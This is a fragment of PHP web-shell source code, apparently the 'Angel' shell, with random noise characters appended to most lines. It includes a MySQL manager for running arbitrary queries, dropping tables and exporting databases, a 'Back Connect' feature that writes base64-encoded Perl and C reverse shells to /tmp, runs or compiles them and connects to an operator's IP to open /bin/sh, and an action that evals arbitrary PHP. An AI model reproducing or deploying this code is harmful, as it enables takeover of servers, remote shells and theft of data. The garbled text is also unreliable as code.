m('Drop table of success');( k; t) F( W7 A2 k2 v% i2 H& ]$ b
$tablename = '';" ? ^; @5 T2 Q5 }' B
} else {
5 h( t/ B! L, s
m(mysql_error());
( ?; l! p J q3 ]1 O& l/ I/ B2 A
}! Y; m5 h! y- J
}2 Z+ @# v( Q1 x+ A6 S2 Z' J
% w {$ x. K% @0 o! ^* I$ r
$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
& w/ d% P$ l5 z3 `0 s
9 [+ Y+ W, f3 D. c7 c* c5 k
formhead(array('title'=>'MYSQL Manager'));
. G' W9 {) q D8 }
makehide('action','sqladmin');
2 r* q F' W$ G+ i
p('<p>');% _( G7 q& j; @$ c$ F0 h! f6 H
p('DBHost:');- G, o5 U& J7 x
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));+ x) M: e$ _& Q" B" d: S* Z
p(':');
- ] k* A. p3 I
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));' q) P6 `. o' k h6 j1 J _
p('DBUser:');6 i- S! y# f9 {3 p; k ^3 ~2 w/ l2 B/ r
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
7 S" h, w" a+ |( r
p('DBPass:');
8 K( F* Y9 F4 V
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));& p8 T! N4 @! s' f' P( d" k; z+ J
p('DBCharset:');( ~4 F# T- a+ W* u$ c
makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
: I- D6 ?& e: v+ x
makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));$ s' I5 g! R* M+ o
p('</p>');/ ^7 Y2 {% C' y
formfoot();
* P9 o! i+ |6 _
?>
$ A0 U3 L5 A. v
<script type="text/javascript">
2 G4 `0 d: E* n: i4 }
function editrecord(action, base64, tablename){1 a9 h9 r6 o9 H# z
if (action == 'del') { - @* Q2 ?: _8 `3 @$ k9 H
if (!confirm('Is or isn\'t deletion record?')) return;* r0 ]+ q/ z+ r3 ^4 G! H$ p; L
}
+ C0 @1 ]3 f* M
$('recordlist').doing.value=action;
, w. I; R u8 Y/ e
$('recordlist').base64.value=base64;
8 }3 u1 \1 i( n( z
$('recordlist').tablename.value=tablename;5 {0 X$ [4 D% Z3 I! C+ X
$('recordlist').submit();
& D$ e# v2 A- W# t2 ?2 r! P. Y6 p
}
# C* W0 k$ R$ J3 p7 a- p( A
function moddbname(dbname) {3 X* \7 R" A% p- \ S8 @9 {$ `
if(!dbname) return; Y; }0 T) }6 |& y" @' l! I7 V
$('setdbname').dbname.value=dbname;7 v% q* X/ Y2 A. P. g
$('setdbname').submit();% Y* x; T4 ^3 ^$ t
}& ?, L- u Y. j/ G7 o
function settable(tablename,doing,page) {
6 J6 }$ t& S% P" ?. I
if(!tablename) return;+ [& q8 P+ Z9 o) O1 j$ w2 s% z
if (doing) {
- \/ c. q/ _( }6 i3 z9 H
$('settable').doing.value=doing;* b: f4 q) U" \5 f
}7 c2 ^5 {) I: E
if (page) {. n6 L* E& I2 P2 z$ ?
$('settable').page.value=page;7 n- k: | s: U8 T$ v C! \
}3 C7 p/ `+ j+ v/ u% U i
$('settable').tablename.value=tablename;
. Q+ |8 @5 ?! o+ Y: e
$('settable').submit();
5 e% N$ B' M; Y, t
}
; E: t$ S; z$ O* `% t$ e
</script>
. ?" a+ z1 X0 Q: g M
<?php$ [9 ~0 n0 S: Z# A7 _- w
//操作记录/ [& b3 O G' p2 `, `! E% k
formhead(array('name'=>'recordlist'));8 h" n: m( g. s6 h. D5 y
makehide('doing');4 S* Q" E: P- Y3 F: W H" x) k% ]
makehide('action','sqladmin');
9 F) O) ?7 J! V- ?
makehide('base64');. m4 T8 o. N. e' ]0 u1 G1 ]
makehide('tablename');& v4 j* V9 z+ Z4 M
p($dbform);
% n# @0 C# O$ k
formfoot();7 R0 x$ O2 M% D: w
//选定数据库8 c+ T$ M+ K6 i L4 ]! ]
formhead(array('name'=>'setdbname'));
! W+ f% B- K7 n& W7 [4 @
makehide('action','sqladmin');2 C3 \5 b$ j) E+ ?* ~9 ~ T' P
p($dbform);* \/ c6 w/ H7 Q7 Z8 E
if (!$dbname) {8 G1 A! k7 t0 Q6 Q7 f; F+ d( }
makehide('dbname');
; ~; w! }7 d# b) W) t" z
}
' C/ F$ p( R6 [0 W3 |2 E( K% x
formfoot();, y, i. c/ p1 ?
//选定表% B* u8 w( C: s* P9 L w
formhead(array('name'=>'settable'));) r: ~+ q' c; `6 S; E
makehide('action','sqladmin');# [4 O; X6 T7 g" i: y9 [# g
p($dbform);
2 L8 H7 \+ q; `- a9 n
makehide('tablename');
, ~$ t. C2 i' _( a
makehide('page',$page);/ g1 S* {9 K) [% [* l0 S
makehide('doing');* o& j8 y( d3 a: U" U6 y
formfoot();
0 }! l: v: ?( W1 t* A
$cachetables = array();
@* a: d5 \: W8 ~5 L# w3 N" f( p
$pagenum = 30;
5 h2 f t7 W3 P( Q* L7 _
$page = intval($page);) U: @( H" ?9 f/ P
if($page) {
% c- D4 V$ a1 T" b1 E$ k# p
$start_limit = ($page - 1) * $pagenum;
9 Q' _" M& X" R8 u& P5 {0 j! w
} else {
4 }' T/ T: m0 D5 G
$start_limit = 0;
6 D6 Y+ `6 X& M3 A4 n; m W
$page = 1;
8 s6 z: T3 v. W7 D/ A
}' N( F2 v' k1 J5 s+ A. q. c
if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
8 G+ U8 l$ O: r) a0 U
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);7 V2 d, l/ k8 [ y% l1 m
//获取数据库信息3 j" J" T* r; |; R# T$ M* }0 L8 U
$mysqlver = mysql_get_server_info();
+ R; h2 F& s$ E* |. E/ m
p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
, J3 ^; n4 G0 ~0 h: \+ @6 b- I
$highver = $mysqlver > '4.1' ? 1 : 0;
% o$ b) O; Z1 M$ J9 T* N# ~
//获取数据库
/ T& t% @; D$ _8 v5 Z O/ Q
$query = q("SHOW DATABASES");
6 G' L9 s; v: i& @, |. E
$dbs = array();
7 n) ]0 v( x6 B
$dbs[] = '-- Select a database --';. z( g; W% u: N9 Z2 y/ \9 R
while($db = mysql_fetch_array($query)) {$ Q4 n4 h, |& k
$dbs[$db['Database']] = $db['Database'];
3 C8 @0 M# R2 o: i* K
}3 w4 x1 m x4 j
makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
7 v @) H9 b1 A" b
$tabledb = array();1 M x6 ^; W( I3 ?7 `* U }
if ($dbname) {+ a$ ]- W" Q) v
p('<p>');
# U1 ?9 F! i4 H: s3 _
p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');0 Z% l B; G3 V- u5 \4 K/ S v
if ($tablename) {
, q7 }- J/ H3 k# s* d. `
p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
r* {" l" s: F
}8 \0 h' Q' C2 H8 g6 r
p('</p>');
& \5 B9 X5 O4 n# ]
mysql_select_db($dbname);
. I6 Q& s7 V& M' d( o% m
$getnumsql = '';8 m0 u$ q* \) D! F* |0 |- D
$runquery = 0;
8 b& K0 f6 e4 {' K, N8 ~4 o
if ($sql_query) {
( _8 ?& K2 l! l# M" v$ N# u' {* I
$runquery = 1;6 n1 D$ G2 p, g/ j! u5 U
}
+ L) P' r q! H3 S& q {
$allowedit = 0;
( r! r3 o; J- G/ n2 l& t
if ($tablename && !$sql_query) {
1 R* Z5 g) U: \2 R
$sql_query = "SELECT * FROM $tablename";* a, e. \' y$ P4 p( A
$getnumsql = $sql_query;- J$ c, o. M; u4 d# o
$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
* a7 F& T: _9 r% Q9 F
$allowedit = 1;
; Q! t$ v% { |# Q
}3 x& H3 ?" E, Y$ [) R$ b
p('<form action="'.$self.'" method="POST">');9 U' @4 E6 i# ?, \8 E. I
p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>'); ?5 M8 ], [2 c2 Q. ]
makehide('tablename', $tablename);4 \% `$ f3 b" e! c
makehide('action','sqladmin');
. j3 E$ t. b! W5 _8 K, u3 P, y; m
p($dbform);! M% ~4 O* m' Z7 ~6 a, o% x
p('</form>');
P2 G* H6 ?+ h
if ($tablename || ($runquery && $sql_query)) {
' V, y1 x( O* x4 }
if ($doing == 'structure') {
& s1 g+ s$ w4 e4 O: L
$result = q("SHOW COLUMNS FROM $tablename");
% v" J7 q& Z }7 h9 N
$rowdb = array();+ V p5 a D0 M5 Y2 L1 |3 ]) s7 K
while($row = mysql_fetch_array($result)) {
; r, [8 @9 G0 b6 f/ J0 X+ @
$rowdb[] = $row;
% s. k, B6 P1 T! r# s/ u$ X9 c! d
}4 X' \- ?7 @* H
p('<table border="0" cellpadding="3" cellspacing="0">');* j3 P$ s) L$ l4 b/ q
p('<tr class="head">');
% d- \+ h' h0 b
p('<td>Field</td>');
# }3 q+ c1 [5 p; y
p('<td>Type</td>');
0 R8 P2 b0 K# r1 ]% F/ C. d/ B# ~) O
p('<td>Null</td>');
. q9 N" u! k% {4 N" o- J: @
p('<td>Key</td>');
' u# |5 y4 j% X. W! e
p('<td>Default</td>');
; c1 K, z0 G# V7 p* l% t7 t
p('<td>Extra</td>');$ o1 A3 }" z1 i
p('</tr>');
9 a( h/ N( @4 W5 d% K5 r
foreach ($rowdb as $row) {
* O( x5 u0 M1 X1 g. [! R' }# z
$thisbg = bg();& M J1 K7 f7 ]! {; e* u( H( @3 e
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
6 u0 |- r5 C# |8 }: F' h$ q
p('<td>'.$row['Field'].'</td>');; i& Q D* X- ^6 E
p('<td>'.$row['Type'].'</td>');
% i) X7 Q! e. k' k8 S% `
p('<td>'.$row['Null'].' </td>');
' K4 y: D8 r" {
p('<td>'.$row['Key'].' </td>');
2 E) p/ p' T, J2 m8 x4 W- e) L/ z) i
p('<td>'.$row['Default'].' </td>');
5 D6 C1 }- N& m I9 q
p('<td>'.$row['Extra'].' </td>');$ U4 W) a0 i. l
p('</tr>');; O" R+ m2 b$ t; k6 A! f
}
. O8 w6 ~5 x% v0 X% s- g
tbfoot();( S/ ?& w, ]$ i- p3 j4 G
} elseif ($doing == 'insert' || $doing == 'edit') {& H+ K. C" W9 W2 u0 w* D
$result = q('SHOW COLUMNS FROM '.$tablename);
+ I& P Q+ x) C6 p
while ($row = mysql_fetch_array($result)) {
+ }& r/ K% j1 Q: p4 f0 N% G
$rowdb[] = $row;
& P! p, m n- X9 z. e& o: Q' x, D9 m
}% U$ e g& ]: s
$rs = array();
$ y* _6 y+ S* O5 M6 y
if ($doing == 'insert') {
0 K4 m- H+ i9 t6 u7 V( L6 X
p('<h2>Insert new line in '.$tablename.' table »</h2>');
4 b+ L8 r$ S. j' A5 N4 |
} else {/ K- h% m& H' j' a* d
p('<h2>Update record in '.$tablename.' table »</h2>');
: S O% V: C# ^! Z$ p6 |# c7 Q& ?
$where = base64_decode($base64);8 {# K2 a7 R: m( N, z- G
$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
! n) Y& V0 e% X6 O, O" R1 k j
$rs = mysql_fetch_array($result);+ T# L: Q# p& Z( Q; ^* I) C, [
}
3 D, E# b' k' h, E
p('<form method="post" action="'.$self.'">');
5 E3 Q, d5 Q% y I q- Y: q
p($dbform);
- J0 t4 B3 G- E# U/ X
makehide('action','sqladmin');
2 E/ [; Y, p$ |
makehide('tablename',$tablename);1 L! \3 x& K v# ~: }
p('<table border="0" cellpadding="3" cellspacing="0">');
) U# N2 Y4 i+ a, y; V+ y1 x0 @1 X8 B
foreach ($rowdb as $row) {
3 R8 q2 W/ z0 K `% F
if ($rs[$row['Field']]) {
" V9 k* F/ ` | q: }. N
$value = htmlspecialchars($rs[$row['Field']]);
; q1 H# P* @7 M; w: d: f ?+ C
} else {3 H3 {) f3 u! V* W" O
$value = '';: l; o" u8 N) B: n! S$ j; j
}
9 b: h& [$ Q0 Y/ O
$thisbg = bg();
7 z7 k( ^0 s* _, M: x
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
) V6 j- x* j! V( n3 A. j
p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
9 h! @" D& _" ~; h3 c
}
1 I6 b. D8 M0 I# O1 O5 |
if ($doing == 'insert') {0 k/ m$ u. ]9 U
p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
. I" L0 ` |- H; D0 n) S- V4 F
} else {
+ e( _6 c, ]& ^+ a
p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');% k7 P' b" M D+ W- k
makehide('base64', $base64);
7 n* v. B4 e8 W7 j. Y
} c( I h9 z" D4 m3 x- o( J, M
p('</table></form>');+ h5 W0 k5 d8 ]' q
} else {
2 j8 R L# O& B5 ?8 {( `- G
$querys = @explode(';',$sql_query);. P, ^& H1 s8 G. X3 z& t. s: w
foreach($querys as $num=>$query) {
/ g& \& e3 y. ~8 q& A; M
if ($query) {
' Y( l. C5 W! i* A) @
p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
7 w) s5 J. Y) N
switch(qy($query))
4 y% O2 q7 e1 f# ?$ @ j% Q
{
& _. U9 Q( ^! i8 \ o
case 0:
3 ], \; H' F K7 I9 A* [) w, |
p('<h2>Error : '.mysql_error().'</h2>');
5 f" o' A5 t Q. A) Q Y0 O4 y5 N
break; : x6 p* A X+ g3 M+ ?$ h
case 1:
" ?- k0 n) k6 c( g9 F
if (strtolower(substr($query,0,13)) == 'select * from') {: L3 t$ D) A2 l7 U0 F4 L; ^4 S) ~
$allowedit = 1;
, A C% `7 E$ X5 ^' N( C
}6 k, X" x3 n( ]- z
if ($getnumsql) {
r: n# d) t' d7 b4 ]
$tatol = mysql_num_rows(q($getnumsql)); z$ W) x& a+ ?9 q( k
$multipage = multi($tatol, $pagenum, $page, $tablename);
- @2 ?6 `5 G& T4 K1 e7 ^. ^
}- ]; |, F# a) f8 {& _
if (!$tablename) {
' m, R9 B/ u$ v: d, {- M! {
$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));3 s/ y7 M4 m6 c
$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);' q. j( W( |, {- j
preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
! C% d% R5 d9 n
$tablename = $matches[1][0];
5 [! t5 \6 L& W- P8 [5 D& r; O
}( N3 g% ~1 |! a; x9 e# Y
$result = q($query);
+ I! q% K" N: X# Y N+ q* Y& Y
p($multipage);& \/ t/ S9 G, ?1 H" {2 `) ?* o
p('<table border="0" cellpadding="3" cellspacing="0">');9 S) E: Y" O! H3 n8 F
p('<tr class="head">');
+ Z: l% V( u: H8 [5 {- c
if ($allowedit) p('<td>Action</td>');4 V5 ?# w6 S0 {9 }/ N, u+ E
$fieldnum = @mysql_num_fields($result);9 l$ I' L0 I: N5 P
for($i=0;$i<$fieldnum;$i++){
1 j, ]2 Z# s% t+ [+ X q
$name = @mysql_field_name($result, $i);
: k" y, @& M: q! I; B
$type = @mysql_field_type($result, $i);
7 J* M+ t4 s. }& E. g# |
$len = @mysql_field_len($result, $i);9 I. E' r6 B8 \1 i0 D9 e
p("<td nowrap>$name<br><span>$type($len)</span></td>");0 U6 e \, \ |" V; |9 `/ b
}
p('</tr>');0 D8 n# h& \6 Y9 N2 o
while($mn = @mysql_fetch_assoc($result)){
" I/ _- I+ b% U$ a7 X: D& F3 P' M
$thisbg = bg();# W3 n9 X; {/ ~: {) A
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
! H/ i* _& c/ r6 ]( V8 J! f
$where = $tmp = $b1 = '';
7 _- [ q1 G* f& w- |3 ?
foreach($mn as $key=>$inside){
2 |0 e5 k% I- A5 _# D
if ($inside) {; p6 i, P" {9 W
$where .= $tmp.$key."='".addslashes($inside)."'";
- b( [, Q4 F% h" e0 O
$tmp = ' AND ';
" }6 F! L% c, l% R. I
}1 Y) c' @7 {6 ~/ V, L! l
$b1 .= '<td nowrap>'.html_clean($inside).' </td>';, G) X! @ Q4 y, y' J
}/ k d5 V/ |) y& f& X
$where = base64_encode($where);
# ^0 j3 {8 p# T9 C6 G; r1 }
if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
# B: u7 p. V; F# }" z4 H0 q+ H4 z* B
p($b1);
) ~0 N0 O6 m" v7 Q3 ?# d
p('</tr>');
$ T, H+ u* L2 {: F( Q
unset($b1);
5 \" ~- S6 O5 W# J" l
}
; D1 \# J* }( m. f5 ~7 x
tbfoot();
0 Z# D5 h4 _! W% z
p($multipage);
" h" T2 S" C; q& w V0 ?
break; 7 J6 V- n" G0 O+ f
case 2:6 i, e! W9 d( t% m: V4 N; v
$ar = mysql_affected_rows();; v7 d- t, e' V- k8 t2 B
p('<h2>affected rows : <b>'.$ar.'</b></h2>');' `5 @% B+ N- s1 f5 h- u
break;* g* n+ s# X' ~& i* U8 ?7 v
}% w, @3 P: C# ]% c
}
: Y1 I! J. _$ e/ i8 E L
}
0 [9 V5 Y8 I; G) d' u
}( \& Q! r! K! v0 c+ G
} else {9 N2 p+ B d; B7 X% I+ Z& o& ?1 Y
$query = q("SHOW TABLE STATUS");# s9 v' `7 n0 D. c( z
$table_num = $table_rows = $data_size = 0;; Q# g9 U& J$ m% {
$tabledb = array();
: W; N4 b! T: [* b5 e
while($table = mysql_fetch_array($query)) {9 M) ]+ Z5 ]3 s- h! y+ Z
$data_size = $data_size + $table['Data_length'];; j# ]/ [4 A% F' R/ [
$table_rows = $table_rows + $table['Rows'];8 L; E% x% B: X# d- h
$table['Data_length'] = sizecount($table['Data_length']);" ~! k/ U3 X6 Z) |2 {$ g: C
$table_num++;
) l& `' T4 L e3 q8 E+ `/ E4 k9 M
$tabledb[] = $table;1 X$ H$ Z3 N% b% x, l5 Y2 `
}, ]7 g, \9 _# c2 Y# m9 r
$data_size = sizecount($data_size);, Q L) j9 p8 j' A' _# y6 I
unset($table);
$ n; I* E6 @& N2 n
p('<table border="0" cellpadding="0" cellspacing="0">');
- ]# ~$ S+ O8 V* H
p('<form action="'.$self.'" method="POST">');/ a8 {0 P! X8 d* Y
makehide('action','sqladmin'); d h3 v# d5 V2 W+ @6 b) q" J
p($dbform);
1 m: k1 C# e9 ~5 i* ^! z7 s
p('<tr class="head">');! L6 h0 R. b0 a8 t
p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1 c$ m. ~ Y5 g0 ?$ G1 i2 R
p('<td>Name</td>');5 X6 {2 P6 R" w/ W
p('<td>Rows</td>');: R, a3 i' e6 d* g: m4 s
p('<td>Data_length</td>');
3 n* f# ]: q- O1 m4 c
p('<td>Create_time</td>');
6 C( @3 l% g1 n* n. ~
p('<td>Update_time</td>');2 S% V) w: b3 n3 f7 Z: F
if ($highver) {7 R3 H0 ^* {- A& X" I+ I7 H
p('<td>Engine</td>');5 h" `5 A2 O. I; x8 f
p('<td>Collation</td>');
0 |/ j* V. G9 ]; j
}) h) `" v" F1 f5 G- n
p('</tr>');
! i% b6 M; a) q( P* V; r
foreach ($tabledb as $key => $table) {* R! I* P7 n- g4 I5 {) A9 j
$thisbg = bg();3 j0 j2 r! p7 r# o( Z9 e5 h
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
8 W$ f! \% e) R |4 ~4 M
p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');8 d B( \, T: H' A @$ {9 J
p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
; @# E1 ^6 T4 X# Z! d; Y
p('<td>'.$table['Rows'].'</td>');
0 v! F4 e( F) D0 Z( Y% q
p('<td>'.$table['Data_length'].'</td>');
6 a* m) W- E3 K$ s2 t4 v( `
p('<td>'.$table['Create_time'].'</td>');. a# m/ Y! W# R7 G- ]( z, \2 ^! x
p('<td>'.$table['Update_time'].'</td>');0 M( d2 [) E: n2 [1 A* m6 |% k! U
if ($highver) {! O4 ~1 U- \. Y7 A* I) Z4 o
p('<td>'.$table['Engine'].'</td>');
Z( H. J; B' d+ m& u& i: J
p('<td>'.$table['Collation'].'</td>');: \8 T) b. l* G
}$ U# I; l2 z+ u/ ^! ?
p('</tr>'); H G/ G0 H; d" z
} W5 m6 x) H: y/ r" h
p('<tr class='.bg().'>');+ b2 O3 b4 D8 x# S' ^" j: i
p('<td> </td>');
3 C$ g; D# v/ N: s& m! F
p('<td>Total tables: '.$table_num.'</td>');
' U& M+ c: J6 x `. {
p('<td>'.$table_rows.'</td>');+ j$ H; V7 }. J5 u% R
p('<td>'.$data_size.'</td>');
* g5 C$ k+ m1 |5 g# ]* ]
p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
5 p0 L$ I7 O! B0 j
p('</tr>');
* ?+ y8 d# c; ]- a( J `# }
p("<tr class="".bg().""><td colspan="".($highver ? 8 : 6).""><input name="saveasfile" value="1" type="checkbox" /> Save as file <input class="input" name="path" value="".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql" type="text" size="60" /> <input class="bt" type="submit" name="downrar" value="Export selection table" /></td></tr>");
: X+ F4 z$ q! k; l. O
makehide('doing','backupmysql');
* x6 }; t( a( Q1 ]
formfoot();
3 E( z' J$ w1 R6 b
p("</table>");" ^& J* r0 p. C8 x
fr($query);* \- [' U& Q* ?- V
}" q5 t( r: W# X
}% c m7 C4 @/ w* t
}; z( r. D0 ~5 v- d7 ^5 J) ^' q7 }
tbfoot();" m5 L" T; M) J8 }7 ?0 N
@mysql_close();
F2 O% b C5 w' I. x3 Q |
}//end sql backup, ~9 |% N# _2 a, }# \' b
elseif ($action == 'backconnect') {" H% y) x5 V$ p
!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];6 [6 c6 ?3 D; R/ e4 V
!$yourport && $yourport = '12345';1 g& `( U5 p6 w2 J
$usedb = array('perl'=>'perl','c'=>'c');
; m9 Q4 a1 U$ t
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
5 q! N/ C% H5 d" I
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".. |5 A9 X0 }! ?
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
3 L. M+ J. E$ D% ]* M
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
\) q2 [- B8 a' e
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".: M7 ^- c, Y: y
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".) u/ b: B' r. H2 H' ` P: B4 J5 K0 n
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2 K1 T. L; V/ y0 w! g( N
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".1 G% p( B3 z& w1 }( {# B
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".. h' ]% K C# U9 K: w2 K* @
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
3 Y' o: s. l+ s- i" x Z
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".3 K/ t8 v2 _# N- E& i1 w* @- [+ Q
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
" d! I* M- ?( z# J! k8 [ ?, K
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".# N0 ~7 { F) y9 N% o" j
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".; G0 U; E( p/ _3 r
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
6 v) h; o4 `9 k
if ($start && $yourip && $yourport && $use){
1 Q# J! ]8 h$ O) \$ D: r
if ($use == 'perl') {
2 u, h7 u& L' E# i, g% \
cf('/tmp/angel_bc',$back_connect);. e/ G$ c/ Z; n
$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");" Z9 C/ U$ }; }1 O
} else {
* c" _5 ?4 p' ^ n! ^
cf('/tmp/angel_bc.c',$back_connect_c);
3 [. J, S: p: g' i9 y! G
$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
7 g2 t% }& h1 n8 i+ C/ o1 e
@unlink('/tmp/angel_bc.c');: q2 D% ?& T3 a6 z7 L& m; T/ e
$res = execute("/tmp/angel_bc $yourip $yourport &");; j9 F! u/ Z5 D$ x5 k4 g
}
7 ~" W8 c) i9 y* g( G X
m("Now script try connect to $yourip port $yourport ...");
- A6 h$ I8 C, E" R- \' c
}1 x% B5 c* ]8 |. r9 g! l- U
formhead(array('title'=>'Back Connect'));0 ~; j7 w: N0 j2 w
makehide('action','backconnect');
: S% p; w- [: I
p('<p>');
9 u9 X; s: Q2 F& v& u
p('Your IP:');
2 s. s. K( J; d2 P/ N, y
makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));" ~; p3 V% D) T, h0 N. W5 N( e
p('Your Port:');
$ p7 m' F% G: F- Q0 V% y+ O
makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));2 A4 I: j H2 {, Y
p('Use:');8 B8 v+ G1 Q9 B. \% L
makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
0 p3 A/ r# u! e/ J( T4 {, e! U! E
makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));; Z5 M3 W J$ u8 I/ H
p('</p>');
8 ^; E' K/ h. U. v6 ]3 a, S! w
formfoot();' c) q8 E( |# Q5 Y8 |
}//end sql backup* J/ C; w ]6 L
elseif ($action == 'eval') {
5 g& D8 U# M8 {# w& U0 X
$phpcode = trim($phpcode);
# T/ t }7 P% r& U: Z! C
if($phpcode){
' @. q( I# h# {& S4 n0 `! n
if (!preg_match('#<\?#si', $phpcode)) {
{+ g3 h: o2 c
$phpcode = "<?php\n\n{$phpcode}\n\n?>";% k% h' p1 \% @7 t% v" D
}2 a6 r4 e+ U, `
eval("?".">$phpcode<?");
0 W' D Y3 p. w
